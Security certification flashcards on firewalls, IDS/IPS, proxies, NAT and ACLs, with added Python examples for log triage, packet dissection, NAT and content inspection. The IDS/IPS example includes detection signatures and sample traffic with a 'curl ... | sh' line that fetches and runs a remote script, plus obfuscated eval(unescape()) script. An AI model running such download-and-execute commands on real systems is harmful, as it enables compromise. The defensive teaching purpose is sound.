Chapter 6 - Network Perimeter Security Flashcards

1
Q
Which tool would you use if you want to view the contents of a packet?
A. TDR
B. Port scanner
C. Protocol analyzer
D. Loopback adapter
A

C. A protocol analyzer (packet sniffer) captures packets and lets you “drill” down through each one, showing its headers and payload layer by layer as they correspond to the OSI model.

2
Q

The honeypot concept is enticing to administrators because
A. It enables them to observe attacks.
B. It traps an attacker in a network.
C. It bounces attacks back at the attacker.
D. It traps a person physically between two locked doors.

A

A. By creating a honeypot, the administrator can observe attacks without sustaining damage to a production server or other computer. Do not confuse this with a honeynet (answer B), which is an entire false network meant to attract and trap attackers. Answer C is not something an administrator would normally do, and answer D describes a mantrap.

3
Q
James has detected an intrusion in his company.  What should he check first?
A. DNS Logs
B. Firewall logs
C. The Event Viewer
D. Performance logs
A

B. If there were an intrusion, the first thing you should check is the firewall logs. DNS logs, the Event Viewer, and performance logs will most likely not show an intrusion into the company network. The best place to look first is the firewall logs, which record what was allowed in and what was denied.

4
Q
Which of the following devices should you employ to protect your network?   (Select the best answer.)
A. Protocol analyzer
B. Firewall
C. DMZ
D. Proxy server
A

B. Install a firewall to protect the network. Protocol analyzers do not help to protect a network but are valuable as vulnerability assessment and monitoring tools. Although a DMZ and a proxy server could possibly help to protect a portion of the network to a certain extent, the best answer is firewall.

5
Q
Which device’s log file will show access control lists and who was allowed access and who wasn’t?
A. Firewall
B. PDA
C. Performance monitor
D. IP proxy
A

A. A firewall contains one or more access control lists (ACLs) defining who is allowed to access the network. The firewall log can also show attempts at access and whether they succeeded or failed. A personal digital assistant (PDA) might list who called or e-mailed, but as of the writing of this book does not use ACLs. Performance Monitor analyzes the performance of a computer, and an IP proxy deals with network address translation, hiding many private IP addresses behind one public address. Although the function of an IP proxy is often built into a firewall, the best answer is firewall.
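
Cards 3 and 5 together make the practical point: the firewall log is the first place to look after an intrusion because it records both what the ACLs allowed and what they denied. The Python script below is an added example, not part of the original flashcards or of any firewall product. It parses a handful of constructed log lines in an assumed `<timestamp> ALLOW|DENY <proto> <src>:<port> -> <dst>:<port>` format (real firewalls each have their own format, so the regex is the part you would adapt) and flags sources that probed many ports or that obtained an allowed connection after a run of denies.

```python
import re

# Assumed log format (constructed for this example; real firewalls differ):
#   <timestamp> <ALLOW|DENY> <TCP|UDP> <src ip>:<src port> -> <dst ip>:<dst port>
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ALLOW|DENY)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample log: one source sweeps several ports and is denied each time,
# then gets an allowed RDP connection; another source just talks HTTPS normally.
SAMPLE_LOG = """\
2024-05-01T02:10:01Z DENY  TCP 198.51.100.7:40001 -> 203.0.113.10:21
2024-05-01T02:10:01Z DENY  TCP 198.51.100.7:40002 -> 203.0.113.10:22
2024-05-01T02:10:02Z DENY  TCP 198.51.100.7:40003 -> 203.0.113.10:23
2024-05-01T02:10:02Z ALLOW TCP 192.0.2.44:52000 -> 203.0.113.10:443
2024-05-01T02:10:03Z DENY  TCP 198.51.100.7:40004 -> 203.0.113.10:25
2024-05-01T02:10:03Z DENY  TCP 198.51.100.7:40005 -> 203.0.113.10:445
2024-05-01T02:10:04Z DENY  UDP 198.51.100.7:40006 -> 203.0.113.10:161
2024-05-01T02:10:09Z ALLOW TCP 198.51.100.7:40007 -> 203.0.113.10:3389
2024-05-01T02:11:30Z ALLOW TCP 192.0.2.44:52001 -> 203.0.113.10:443
garbage line that does not parse
"""


def parse_log(text):
    """Turn log text into a list of dicts, skipping lines that do not match the format."""
    entries = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m:
            e = m.groupdict()
            e["sport"], e["dport"] = int(e["sport"]), int(e["dport"])
            entries.append(e)
    return entries


def triage(entries, scan_threshold=5):
    """Summarise per source address: denied attempts, distinct (proto, port) pairs
    probed, and any ALLOW entries that came after denies from the same source. A scan
    followed by a successful connection is the first thing to chase. Entries are
    assumed to be in chronological order, as the firewall wrote them."""
    per_src = {}
    for e in entries:
        s = per_src.setdefault(e["src"], {"denied": 0, "ports": set(), "allowed_after_deny": []})
        if e["action"] == "DENY":
            s["denied"] += 1
            s["ports"].add((e["proto"], e["dport"]))
        elif s["denied"]:
            s["allowed_after_deny"].append((e["ts"], e["dst"], e["dport"]))
    report = {
        src: {"denied": s["denied"], "distinct_ports": len(s["ports"]),
              "allowed_after_deny": s["allowed_after_deny"]}
        for src, s in per_src.items()
    }
    suspects = sorted(src for src, s in report.items()
                      if s["distinct_ports"] >= scan_threshold or s["allowed_after_deny"])
    return report, suspects


if __name__ == "__main__":
    report, suspects = triage(parse_log(SAMPLE_LOG))
    for src in suspects:
        print(src, report[src])
```

The threshold of five distinct ports is arbitrary; what matters is that denies are evidence of what the ACL stopped, while an ALLOW from the same source after the denies is the connection that actually needs investigating on the host.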

6
Q
Where are software firewalls usually located?
A. On routers
B. On servers
C. On clients
D. On every computer
A

C. Software-based firewalls, such as the Windows Firewall, normally run on client computers. Although a software-based firewall can also run on a server, that is less common. A SOHO router might have a built-in firewall, but not all routers have firewalls.

7
Q

Where is the optimal place to have a proxy server?
A. In between two private networks
B. In between a private and a public network
C. In between two public networks
D. On all of the servers

A

B. Proxy servers should normally be between the private and the public network. This way they can act as a go-between for all the computers located on the private network. This applies especially to IP proxy servers but might also include HTTP proxy servers.

8
Q
A coworker has installed an SMTP server on the company firewall.  What security principle does this violate?
A. Chain of custody
B. Use of a device as it was intended
C. Man trap
D. Use of multifunction network devices
A

B. SMTP servers should not be installed on a company firewall; running a mail service is not the intended use of a firewall device, and every extra service on it is extra attack surface on the perimeter. The SMTP server should most likely be installed within a DMZ.

9
Q
You are working on a server and are busy implementing a network intrusion detection system on the network.  You need to monitor the network traffic from the server.  What mode should you configure the network adapter to work in?
A. Half-duplex mode
B. Full-duplex mode
C. Auto configuration mode
D. Promiscuous mode
A

D. To monitor network traffic from the server for the NIDS, you should configure the network adapter to work in promiscuous mode; this forces the network adapter to pass every frame it receives up to the operating system, not just the frames addressed to that particular network adapter. The other three answers have to do with duplexing, that is, whether the network adapter can send and receive simultaneously, and how that setting is negotiated.
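
Cards 1 and 9 together describe what a sniffer needs: an adapter in promiscuous mode so that frames meant for other hosts are passed up, and a protocol analyzer that drills through each frame layer by layer. The Python below is an added example and is not from the original flashcards or from any particular analyzer. It constructs two sample Ethernet/IPv4/TCP frames (checksums left at zero, so they are test input only), models the adapter's receive filter with and without promiscuous mode, and dissects whatever gets through using only the standard `struct` module.

```python
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def build_frame(dst_mac, src_mac, src_ip, dst_ip, sport, dport, payload, flags=0x18):
    """Construct a minimal Ethernet/IPv4/TCP frame. Checksums are left at zero: this is
    sample input for the dissector, not something to put on a real wire."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1, 1, (5 << 12) | flags, 65535, 0, 0) + payload
    ipv4 = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64,
                       IPPROTO_TCP, 0, ip_bytes(src_ip), ip_bytes(dst_ip))
    eth = struct.pack("!6s6sH", mac_bytes(dst_mac), mac_bytes(src_mac), ETHERTYPE_IPV4)
    return eth + ipv4 + tcp


def dissect(frame):
    """Drill down through one frame: Ethernet (layer 2), IPv4 (layer 3), TCP (layer 4),
    then whatever payload is left for the upper layers."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    layers = {"ethernet": {"dst": mac_str(dst), "src": mac_str(src), "type": ethertype}}
    if ethertype != ETHERTYPE_IPV4:
        return layers
    ip = frame[14:]
    if len(ip) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _csum, sip, dip = struct.unpack(
        "!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    ip = ip[:total_len]                     # ignore any Ethernet padding after the datagram
    layers["ipv4"] = {"src": ip_str(sip), "dst": ip_str(dip), "proto": proto, "ttl": ttl}
    if proto != IPPROTO_TCP:
        return layers
    tcp = ip[ihl:]
    if len(tcp) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4
    layers["tcp"] = {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
                     "flags": off_flags & 0x1FF}
    layers["payload"] = tcp[data_off:]
    return layers


def nic_accepts(frame, my_mac, promiscuous):
    """Model the adapter's receive filter. Normally only unicast to our own MAC,
    broadcast and multicast frames are passed up; promiscuous mode passes everything."""
    if promiscuous:
        return True
    dst = mac_str(frame[:6])
    is_multicast = (int(dst[:2], 16) & 0x01) == 1     # I/G bit of the first octet
    return dst == my_mac or dst == BROADCAST or is_multicast


def capture(frames, my_mac, promiscuous):
    """Return the dissected view of every frame the adapter would hand to the sniffer."""
    return [dissect(f) for f in frames if nic_accepts(f, my_mac, promiscuous)]


# Constructed sample traffic: one frame addressed to the monitoring server itself and
# one between two other hosts on the same segment. MACs and IPs are made up.
SENSOR_MAC = "02:00:00:00:00:01"
SAMPLE_FRAMES = [
    build_frame(SENSOR_MAC, "02:00:00:00:00:02", "10.0.0.2", "10.0.0.1", 40000, 22,
                b"SSH-2.0-client\r\n"),
    build_frame("02:00:00:00:00:03", "02:00:00:00:00:04", "10.0.0.4", "10.0.0.3", 51000, 80,
                b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n"),
]

if __name__ == "__main__":
    for mode in (False, True):
        seen = capture(SAMPLE_FRAMES, SENSOR_MAC, promiscuous=mode)
        print(f"promiscuous={mode}: {len(seen)} frame(s)")
        for layers in seen:
            print("  ", layers["ipv4"]["src"], "->", layers["ipv4"]["dst"], "tcp",
                  layers["tcp"]["sport"], "->", layers["tcp"]["dport"], layers["payload"][:16])
```

Without promiscuous mode the sensor only ever sees the SSH frame addressed to itself; with it, the HTTP conversation between the two other hosts shows up too. On a switched network the adapter setting alone is not enough: the switch still has to deliver those frames to the sensor's port (a SPAN/mirror port or a tap), which is the part a flashcard answer leaves out.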

10
Q
Which of the following displays a single public IP address to the Internet while hiding a group of internal private IP addresses?
A. HTTP proxy
B. Protocol analyzer
C. IP proxy
D. SMTP proxy
A

C. An IP proxy displays a single public IP address to the Internet while hiding a group of internal private IP addresses. It sends data back and forth between the IP addresses by using Network Address Translation (NAT). This functionality is usually built into SOHO routers and is one of the main functions of those routers. HTTP proxies store commonly accessed Internet information. Protocol analyzers enable the capture and viewing of network data. SMTP proxies act as a go-between for e-mail.
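
To make the NAT behaviour in this card concrete, here is an added Python example of the translation table an IP proxy keeps; it is not from the original flashcards or from any router firmware. Two internal hosts that happen to use the same source port reach the same server through one public address, each gets its own translated port (so this is the port-based variant, PAT), the server's reply is mapped back to the right host, and a packet from an unrelated host with no table entry is dropped. All addresses are constructed from the documentation ranges.

```python
import ipaddress


class PatGateway:
    """Port Address Translation: one public address in front of many private ones.
    Each new outbound flow is rewritten to the public IP plus a unique port, replies
    are mapped back through that port, and inbound packets with no table entry are
    dropped, which is why hosts behind the gateway are not reachable unsolicited."""

    def __init__(self, public_ip, first_port=49152, last_port=65535):
        self.public_ip = public_ip
        self.next_port = first_port
        self.last_port = last_port
        self.outbound_map = {}   # (priv_ip, priv_port, remote_ip, remote_port) -> public port
        self.inbound_map = {}    # (public_port, remote_ip, remote_port) -> (priv_ip, priv_port)

    def translate_outbound(self, pkt):
        """Rewrite a packet leaving the private network; returns the translated packet."""
        if not ipaddress.ip_address(pkt["src"]).is_private:
            raise ValueError(f"{pkt['src']} is not a private address; refusing to translate")
        key = (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
        port = self.outbound_map.get(key)
        if port is None:
            if self.next_port > self.last_port:
                raise RuntimeError("translation port pool exhausted")
            port = self.next_port
            self.next_port += 1
            self.outbound_map[key] = port
            self.inbound_map[(port, pkt["dst"], pkt["dport"])] = (pkt["src"], pkt["sport"])
        return {**pkt, "src": self.public_ip, "sport": port}

    def translate_inbound(self, pkt):
        """Rewrite a packet arriving from the Internet, or return None to drop it."""
        if pkt["dst"] != self.public_ip:
            return None
        entry = self.inbound_map.get((pkt["dport"], pkt["src"], pkt["sport"]))
        if entry is None:
            return None                       # no matching outbound flow: unsolicited
        priv_ip, priv_port = entry
        return {**pkt, "dst": priv_ip, "dport": priv_port}


# Constructed scenario: two internal hosts use the same source port to reach the same
# external server; an unrelated host then probes the public address.
PUBLIC_IP = "203.0.113.10"
SERVER = "198.51.100.80"


def demo():
    gw = PatGateway(PUBLIC_IP)
    host_a = {"src": "192.168.1.10", "sport": 5000, "dst": SERVER, "dport": 443}
    host_b = {"src": "192.168.1.11", "sport": 5000, "dst": SERVER, "dport": 443}
    out_a = gw.translate_outbound(host_a)
    out_b = gw.translate_outbound(host_b)
    out_a_again = gw.translate_outbound(host_a)          # same flow reuses its port
    reply_to_b = gw.translate_inbound(
        {"src": SERVER, "sport": 443, "dst": PUBLIC_IP, "dport": out_b["sport"]})
    probe = gw.translate_inbound(
        {"src": "198.51.100.7", "sport": 40000, "dst": PUBLIC_IP, "dport": out_a["sport"]})
    return {"out_a": out_a, "out_b": out_b, "out_a_again": out_a_again,
            "reply_to_b": reply_to_b, "probe": probe}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Note that the gateway hides the private addresses but is not a security control in itself: anything the internal host initiates gets a table entry, so a host that has been tricked into connecting outbound has opened its own path for replies.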

11
Q
If your ISP blocks objectionable material, what device would you guess has been implemented?
A. Proxy server
B. Firewall
C. Internet content filter
D. NIDS
A

C. An Internet content filter, usually implemented as content-control software, can block objectionable material before it ever reaches the user. This is common in schools, government, and many companies.

12
Q
Of the following, which is a collection of servers that was set up to attract hackers?
A. DMZ
B. Honeypot
C. Honeynet
D. VLAN
A

C. A honeynet is a collection of servers set up to attract hackers. A honeypot is usually one computer or one server that has the same purpose. A DMZ is the demilitarized zone that is in between the LAN and the Internet. A VLAN is a virtual LAN.

13
Q
Which of the following will detect malicious packets and discard them?
A. Proxy server
B. NIDS
C. NIPS
D. PAT
A

C. NIPS, or a network intrusion prevention system, detects and discards malicious packets. A NIDS only detects them and alerts the administrator. A proxy server acts as a go-between for clients sending data to systems on the Internet. PAT is Port Address Translation, which hides many private addresses behind one public address by giving each connection its own port.

14
Q
Which of the following will an Internet filtering appliance analyze? (Select the three best answers.)
A. Content
B. Certificates
C. Certificate revocation lists
D. URLs
A

A, B, and D. An Internet filtering appliance analyzes content, certificates, and URLs. Certificate revocation lists will most likely not be analyzed by the appliance itself; remember that CRLs are published only periodically.

15
Q
Which of the following devices would detect but not react to suspicious behavior on the network?
A. NIPS
B. Firewall
C. NIDS
D. HIDS
A

C. A NIDS will detect suspicious behavior but most likely not react to it. To prevent it and react to it you would want a NIPS. Firewalls block certain types of traffic but by default do not check for suspicious behavior. HIDS is the host-based version of an IDS; it checks only the local computer, not the network.

16
Q
One of the programmers in your organization complains that he can no longer transfer files to the FTP server. You check the network firewall and see that the proper FTP ports are open.  What should you check next?
A. ACLs
B. NIDS
C. AV definitions
D. FTP permissions
A

A. Access control lists can block particular traffic (such as FTP transfers) even when the appropriate ports are open; a deny rule earlier in the list can match the programmer's address before the rule that opens the port is reached. A NIDS detects traffic and reports on it but does not prevent it. Antivirus definitions have no bearing on this scenario. Because the programmer was able to connect to the FTP server, the password should not be the issue. FTP permissions might be an issue, but since you are already working in the firewall, check the ACL first; then check FTP permissions, passwords, and so on.

17
Q
Which of the following is likely to be the last rule contained within the ACLs of a firewall?
A. Time of day restrictions
B. Explicit allow
C. IP allow any
D. Implicit deny
A

D. Implicit deny (block all) is often the last rule in a firewall; it is added automatically by the firewall, not by the user. Any rules that allow traffic will be before the implicit deny/block all on the list. Time of day restrictions will probably be stored elsewhere but otherwise would be before the implicit deny as well.

18
Q

Which of the following best describes an IPS?
A. A system that identifies attacks
B. A system that stops attacks in progress
C. A system that is designed to attract and trap attackers
D. A system that logs attacks for later analysis

A

B. An IPS (intrusion prevention system) is a system that prevents or stops attacks in progress. A system that only identifies attacks would be an IDS. A system designed to attract and trap attackers would be a honeypot. A system that logs attacks would also be an IDS or several other devices or servers.

19
Q
What is a device doing when it actively monitors data streams for malicious code?
A. Content inspection
B. URL filtering
C. Load balancing
D. NAT
A

A. A device that is actively monitoring data streams for malicious code is inspecting the content. URL filtering is the inspection of the URL only (for example, www.comptia.org). Load balancing is the act of dividing up workload between multiple computers. NAT is network address translation, which is often accomplished by a firewall or IP proxy.
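
Cards 13, 15, 18 and 19 draw the same two distinctions: detect-and-alert (NIDS) versus detect-and-drop (NIPS), and URL filtering versus inspecting the content of the data stream. The Python below is an added example written for this page; it is not from the flashcards or from any IDS product, and its blocklist, signatures and packets are constructed. It inspects a short sequence of packets in either mode and, because it reassembles each flow before matching, it also shows why "data stream" matters: a signature split across two segments is missed when each packet is checked on its own.

```python
import re
from urllib.parse import urlsplit

# Constructed blocklist and signatures; real appliances ship vendor feeds.
URL_BLOCKLIST = {"malware.example", "phish.example"}
CONTENT_SIGNATURES = {
    "js-eval-unescape": re.compile(rb"eval\(unescape\("),
    "pipe-to-shell":    re.compile(rb"curl\s+\S+\s*\|\s*(sh|bash)\b"),
}


class Inspector:
    """mode='ids': alert only and always forward. mode='ips': alert, drop the offending
    packet and drop the rest of that flow. With reassemble=True each payload is checked
    against the whole stream seen so far for its flow, not just the packet in hand."""

    def __init__(self, mode="ids", reassemble=True):
        if mode not in ("ids", "ips"):
            raise ValueError("mode must be 'ids' or 'ips'")
        self.mode = mode
        self.reassemble = reassemble
        self.streams = {}          # flow id -> bytes seen so far
        self.blocked_flows = set()
        self.alerts = []           # (flow id, reason), in order

    def _url_verdict(self, url):
        """URL filtering looks only at the address being requested."""
        if not url:
            return None
        host = urlsplit(url).hostname or ""
        return f"url-blocklist:{host}" if host in URL_BLOCKLIST else None

    def _content_verdict(self, flow, payload):
        """Content inspection looks at the bytes, here the reassembled stream."""
        if self.reassemble:
            self.streams[flow] = self.streams.get(flow, b"") + payload
            data = self.streams[flow]
        else:
            data = payload
        for name, sig in CONTENT_SIGNATURES.items():
            if sig.search(data):
                return f"signature:{name}"
        return None

    def process(self, pkt):
        """Return 'forward' or 'drop' for one packet {'flow', 'url', 'payload'}. The url
        is assumed to have been extracted from the HTTP request line already."""
        flow = pkt["flow"]
        if flow in self.blocked_flows:
            return "drop"
        reason = self._url_verdict(pkt.get("url")) or self._content_verdict(flow, pkt["payload"])
        if reason is None:
            return "forward"
        self.alerts.append((flow, reason))
        if self.mode == "ips":
            self.blocked_flows.add(flow)
            return "drop"
        return "forward"


# Constructed traffic: a clean page, a blocklisted host, a script whose malicious call
# is split across two TCP segments, and a file that pipes a download into a shell.
SAMPLE_PACKETS = [
    {"flow": "A", "url": "http://www.example.org/index.html", "payload": b"<html><body>hello</body></html>"},
    {"flow": "B", "url": "http://malware.example/dl.php",     "payload": b"<html>loading...</html>"},
    {"flow": "C", "url": "http://cdn.example.net/lib.js",     "payload": b"var p=document.location;eval(unes"},
    {"flow": "C", "url": "http://cdn.example.net/lib.js",     "payload": b"cape('%63%6f%64%65'));"},
    {"flow": "D", "url": "http://www.example.org/setup.txt",  "payload": b"curl http://203.0.113.9/x.sh | sh\n"},
]


def run(mode, reassemble=True):
    """Push the sample packets through one inspector; return (verdicts, alerts)."""
    insp = Inspector(mode, reassemble)
    verdicts = [insp.process(p) for p in SAMPLE_PACKETS]
    return verdicts, insp.alerts


if __name__ == "__main__":
    for mode, reassemble in (("ids", True), ("ips", True), ("ids", False)):
        verdicts, alerts = run(mode, reassemble)
        print(f"{mode} reassemble={reassemble}: {verdicts} alerts={alerts}")
```

In IDS mode every packet is forwarded and three alerts are raised; in IPS mode the blocklisted request, the second half of the split script and the pipe-to-shell file are dropped. Turn reassembly off and flow C is never caught at all, which is the evasion a per-packet inspector is open to.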

20
Q
Allowing or denying traffic based on ports, protocols, addresses, or direction of data is an example of what?
A. Port security
B. Content inspection
C. Firewall rules
D. Honeynet
A

C. Firewall rules (ACLs) are generated to allow or deny traffic. They can be based on ports, protocols, IP addresses, or which way the data is headed. Port security deals more with switches and the restriction of MAC addresses that are allowed to access particular physical ports. Content inspection is the filtering of web content, checking for inappropriate or malicious material. A honeynet is a group of computers or other systems designed to attract and trap an attacker.
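
Cards 16, 17 and 20 describe the same mechanism from three angles: rules match on direction, protocol, addresses and ports; the first matching rule wins; and an implicit deny sits at the end for anything no rule allowed. The Python below is an added example, not from the flashcards or from any firewall vendor; the ACL, addresses and probe packets are constructed. It evaluates a small ACL in order, supplies the implicit deny when nothing matches, and includes a `trace` helper for the situation in card 16, where the FTP port is open yet one programmer is still blocked.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    action: str                                # "allow" or "deny"
    direction: str = "any"                     # "in", "out" or "any"
    proto: str = "any"                         # "tcp", "udp" or "any"
    src: str = "0.0.0.0/0"                     # CIDR
    dst: str = "0.0.0.0/0"                     # CIDR
    dports: Optional[Tuple[int, int]] = None   # inclusive (low, high); None = any port


def rule_matches(rule, pkt):
    """Every field of the rule that is not 'any' must match the packet."""
    if rule.direction != "any" and rule.direction != pkt["direction"]:
        return False
    if rule.proto != "any" and rule.proto != pkt["proto"]:
        return False
    if ipaddress.ip_address(pkt["src"]) not in ipaddress.ip_network(rule.src):
        return False
    if ipaddress.ip_address(pkt["dst"]) not in ipaddress.ip_network(rule.dst):
        return False
    if rule.dports is not None:
        low, high = rule.dports
        if not low <= pkt["dport"] <= high:
            return False
    return True


def trace(acl, pkt):
    """Walk the ACL top to bottom, recording each rule checked, and stop at the first
    match. Returns (steps, (action, rule name)); the implicit deny is not a rule the
    administrator wrote, it is what applies when the list runs out."""
    steps = []
    for rule in acl:
        matched = rule_matches(rule, pkt)
        steps.append((rule.name, matched))
        if matched:
            return steps, (rule.action, rule.name)
    return steps, ("deny", "implicit-deny")


def evaluate(acl, pkt):
    return trace(acl, pkt)[1]


def pkt(src, dst, dport, proto="tcp", direction="in"):
    return {"src": src, "dst": dst, "dport": dport, "proto": proto, "direction": direction}


# Constructed ACL. The first rule was added to isolate one subnet; it sits above the FTP
# rules, so hosts in that subnet are denied even though port 21 is "open".
FTP_SERVER = "192.0.2.20"
PERIMETER_ACL = [
    Rule("block-quarantined-subnet", "deny", src="10.1.5.0/24"),
    Rule("ftp-control", "allow", direction="in", proto="tcp", dst=f"{FTP_SERVER}/32", dports=(21, 21)),
    Rule("ftp-passive-data", "allow", direction="in", proto="tcp", dst=f"{FTP_SERVER}/32",
         dports=(50000, 51000)),
    Rule("web", "allow", direction="in", proto="tcp", dst="192.0.2.0/24", dports=(443, 443)),
]

if __name__ == "__main__":
    for probe in (pkt("10.1.5.23", FTP_SERVER, 21), pkt("10.1.6.9", FTP_SERVER, 21),
                  pkt("10.1.6.9", FTP_SERVER, 22)):
        steps, verdict = trace(PERIMETER_ACL, probe)
        print(probe["src"], "->", probe["dport"], verdict, steps)
```

Running the trace for the programmer at 10.1.5.23 shows the walk stopping at the first rule, which is the answer to card 16 without touching the FTP server. The same helper exposes the ordering mistake behind card 17's option C: put an "allow any" rule at the top and every trace ends there, so the rules below it never fire.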